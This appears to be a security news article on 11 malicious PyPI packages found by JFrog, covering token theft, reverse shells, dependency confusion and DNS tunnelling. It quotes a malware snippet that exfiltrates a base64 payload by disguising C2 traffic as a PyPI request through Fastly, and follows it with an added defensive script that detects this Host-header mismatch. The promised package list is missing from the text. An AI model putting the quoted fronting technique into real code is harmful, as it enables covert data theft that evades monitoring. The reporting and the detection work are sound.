JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.
Below is the list of malicious Python packages:
The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.
Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with pypi.org.
“The malware’s communication is quite simple:
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI), which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.
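The fronting trick in the quoted snippet leaves a static fingerprint: the URL names one host while the Host header names another. The following is an added example (not code from the JFrog report) of a small `ast`-based check that a package reviewer could run over a distribution's source files to flag that mismatch; SAMPLE is a constructed input mirroring the snippet above plus one benign request.

```python
# Added example (not from the JFrog report): a static check that flags any call
# whose headers={'Host': ...} names a different host than its URL argument, the
# CDN-fronting pattern quoted above. Folds string concatenation and simple assignments.
import ast
from urllib.parse import urlparse

def _const_str(node, env, depth=0):
    """Static value of a string expression, or None; `static + dynamic` yields the prefix."""
    if depth > 32:  # guard against self-referential assignments such as x = x + "a"
        return None
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left = _const_str(node.left, env, depth + 1)
        right = _const_str(node.right, env, depth + 1)
        return left + right if left is not None and right is not None else left
    if isinstance(node, ast.Name) and node.id in env:
        return _const_str(env[node.id], env, depth + 1)
    return None

def find_host_mismatches(source):
    """Return [(lineno, url_host, header_host)] for each mismatching call in `source`."""
    tree = ast.parse(source)
    env = {}  # variable name -> AST of its last simple assignment
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
            env[node.targets[0].id] = node.value
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        url = _const_str(node.args[0], env)
        url_host = urlparse(url).hostname if url else None
        for kw in node.keywords:
            if kw.arg != "headers" or not isinstance(kw.value, ast.Dict):
                continue
            for key, value in zip(kw.value.keys, kw.value.values):
                if key is None or (_const_str(key, env) or "").lower() != "host":
                    continue  # skip **spread entries and non-Host headers
                header_host = _const_str(value, env)
                if url_host and header_host and header_host.lower() != url_host.lower():
                    hits.append((node.lineno, url_host, header_host))
    return hits
# Constructed sample: the quoted snippet plus one benign request for contrast.
SAMPLE = '''from urllib import request
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})
ok = request.Request("https://pypi.org/simple/", headers={"Host": "pypi.org"})
'''
```

Because the URL prefix is static even when the payload is not, the check still recovers the PyPI host and reports the Fastly backend named in the header, while the benign request to pypi.org is left alone.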
The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.
The dependency confusion technique consists of uploading tainted components that have the same name as the legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique tricks the target’s package manager into downloading and installing the malicious module.
The “ipboards” and “pptest” packages were found using DNS tunneling for data exfiltration; this is the first time that this technique has been seen in malware uploaded to PyPI.
“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.